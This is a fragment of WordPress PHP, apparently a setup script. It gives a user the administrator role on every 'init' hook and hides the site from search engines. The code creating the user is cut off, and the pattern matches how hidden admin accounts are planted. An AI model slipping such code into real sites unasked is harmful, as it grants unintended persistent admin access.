set_role( 'administrator' ); } } add_action( 'init', 'setup_admin_user' ); /** * Custom script to set up search engine visibility */ function setup_search_engine_visibility() { if ( get_option( 'blog_public' ) === '1' ) { update_option( 'blog_public', !WP_SEARCH_ENGINE_VISIBILITY ); } } add_action( 'init', 'setup_search_engine_visibility' );